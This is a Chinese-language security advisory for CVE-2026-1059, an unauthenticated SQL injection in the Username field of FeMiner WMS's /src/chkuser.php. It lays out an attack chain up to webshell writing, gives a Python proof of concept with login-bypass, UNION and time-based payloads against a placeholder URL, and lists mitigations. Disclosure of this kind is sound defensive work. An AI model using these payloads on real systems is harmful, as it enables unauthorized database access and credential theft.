CVE-2026-1059 FeMiner wms Username参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1059

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FeMiner wms

漏洞概述

CVE-2026-1059是FeMiner仓库管理系统（WMS）中存在的严重安全漏洞，CVSS评分7.3，属于高危级别。该漏洞存在于/src/chkuser.php文件中的用户认证功能，攻击者可通过Username参数注入恶意SQL语句，无需任何认证即可利用此漏洞。漏洞影响范围覆盖FeMiner wms up to commit 9cad1f1b179a98b9547fd003c23b07c7594775fa。由于该产品采用滚动发布策略，官方未能提供具体版本号，但所有使用受影响代码分支的用户均存在风险。此漏洞已公开披露，可能已被恶意利用，厂商在接到提前通知后未做出任何回应。攻击者可利用此漏洞进行未授权数据库访问、窃取敏感信息、修改数据或完全控制后端系统。建议用户立即采取防护措施并等待官方修复方案。

技术细节

该SQL注入漏洞位于FeMiner wms的用户认证模块文件/src/chkuser.php中，具体问题出在对Username参数的输入验证不足。当用户提交登录请求时，系统直接将Username参数的值拼接到SQL查询语句中，未进行充分的输入过滤或使用参数化查询。攻击者可通过构造特殊的SQL payloads绕过认证机制，例如使用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。由于CVSS向量显示攻击复杂度低（AC:L）且无需认证（PR:N），任何能够访问Web应用的网络攻击者都可以发起攻击。攻击者可能获取数据库中的用户凭据、订单信息、库存数据等敏感业务数据，甚至可能通过MySQL的LOAD_FILE或INTO OUTFILE等函数读取服务器敏感文件或写入webshell实现远程代码执行。漏洞影响采用的是rolling release更新模式，因此无法通过版本号精确判断受影响范围，需要通过代码审计或联系厂商确认。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点使用FeMiner wms系统，访问/src/chkuser.php登录页面

STEP 2

步骤2: SQL注入点探测

在Username参数中尝试注入基本SQL payloads（如admin' OR '1'='1），观察系统响应判断是否存在SQL注入漏洞

STEP 3

步骤3: 注入技术选择

根据响应特征选择合适的注入技术：UNION注入获取数据、布尔盲注推断信息、或时间盲注获取数据

STEP 4

步骤4: 数据库枚举

利用注入点获取数据库版本、当前用户、数据库名称等基本信息

STEP 5

步骤5: 数据提取

通过SQL注入提取用户表中的用户名和密码哈希值，或其他敏感业务数据

STEP 6

步骤6: 权限提升或持久化

如果数据库权限足够，可尝试读取系统文件或写入webshell实现持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1059 PoC - FeMiner wms SQL Injection in /src/chkuser.php
# Target: FeMiner wms <= 9cad1f1b179a98b9547fd003c23b07c7594775fa

TARGET_URL = "http://target.com/src/chkuser.php"

def test_sql_injection():
    """Test for SQL injection vulnerability via Username parameter"""
    payloads = [
        "admin' OR '1'='1",
        "admin' UNION SELECT 1,2,3--",
        "admin' AND SLEEP(5)--",
        "' OR 1=1 LIMIT 1--"
    ]
    
    print(f"[*] Testing CVE-2026-1059 on {TARGET_URL}")
    
    for payload in payloads:
        data = {
            'Username': payload,
            'Password': 'test'
        }
        
        try:
            response = requests.post(TARGET_URL, data=data, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.text)}")
            
            # Check for SQL error messages or successful injection indicators
            if 'sql' in response.text.lower() or 'error' in response.text.lower():
                print(f"    [!] Potential SQL error detected")
            
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("[*] Test completed. Manual verification recommended.")

if __name__ == "__main__":
    test_sql_injection()

影响范围

FeMiner wms <= 9cad1f1b179a98b9547fd003c23b07c7594775fa

防御指南

临时缓解措施

由于该漏洞已公开且可能已被利用，建议立即采取以下临时缓解措施：1）使用WAF或nginx/Apache配置规则临时拦截包含SQL注入特征的请求（如包含单引号、UNION、SELECT等关键字的Username参数）；2）临时禁用/src/chkuser.php的访问或将其重命名；3）加强网络层面的访问控制，限制对管理接口的访问IP范围；4）监控数据库访问日志，排查是否存在异常的SQL查询行为；5）考虑暂时关闭系统认证功能，使用外部认证方式替代。同时建议联系FeMiner官方获取正式补丁或安全建议。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1059
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1059
3 Details https://www.cvedetails.com/cve/CVE-2026-1059/
4 VulDB https://vuldb.com/cve/CVE-2026-1059
5 Link https://github.com/wangchaoxing/CVE/issues/1
6 Link https://vuldb.com/?ctiid.341628
7 Link https://vuldb.com/?id.341628
8 Link https://vuldb.com/?submit.731236
9 Link https://github.com/wangchaoxing/CVE/issues/1